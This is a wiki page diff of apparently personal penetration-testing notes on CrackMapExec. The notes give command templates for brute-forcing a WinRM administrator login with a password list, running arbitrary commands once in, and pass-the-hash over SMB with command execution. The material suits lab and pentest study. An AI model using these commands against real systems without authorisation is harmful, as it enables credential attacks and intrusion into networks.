Differences

This shows you the differences between two versions of the page.

--- cme [2024/02/04 01:58] – gman
+++ cme [2024/02/04 02:08] (current) – [CME & WinRM] gman
@@ Line 4: / Line 4: @@
   * CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
   * Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
+  * See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.
 **Supported Protocols:** WinRM, MSSQL, SMB, SSH
-For help and syntax, just issue the command: crackmapexec
+For help and syntax, just issue the command: ''crackmapexec'' or...
 <code>
 crackmapexec -h
 crackmapexec winrm -h # (for help specific to the winrm protocol)
@@ Line 15: / Line 16: @@
 </code>
-**General Syntax:** ''crackmapexec <protocol> <target(s)> -u username -p password''
+**General Syntax:**
-  * Examples:
-    * ''crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'''    or...
-    * ''crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'''
-• See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.
+<code>
+crackmapexec <protocol> <target(s)> -u username -p password
+</code>
+**Examples:**
+<code>
+crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@' # or...
+crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'
+</code>
+===== CME & WinRM =====
+**Syntax:**
+<code>
+crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
+</code>
+You can use the ''-u'' switch to specify a file of possible user names to try.
+  * But, if we can get into the admin account, we don't have to do priv esc (so we test with one username, "administrator," first).
+  * You should get a green "**[+]**" if successful.
+Look over the output (from the top down):
+  * First line: you can see it actually connects to WinRM.
+  * NOTE: wsman is an implementation of WinRM: windows management.
+**Execute Commands:** If you successfully found login credentials, you can crackmapexec to execute arbitrary Windows commands on the target machine. Syntax:
+<code>
+crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami"
+crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
+</code>
+You should get some happy feedback along with the results of your command execution.
+  * ''systeminfo'' (Windows) takes a while to run but provides a lot of information about your target system.
+===== CME & Pass-the-Hash =====
+<code>
+crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
+</code>
+This should indicated whether or not it works.
+  * If you get a green **[+]** and **(Pwn3d!)** then it works and you can try the execution of commands on the system...
+<code>
+crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
+</code>
+It should give you visual feedback about the command execution. And there you go. Execute what you want.
+----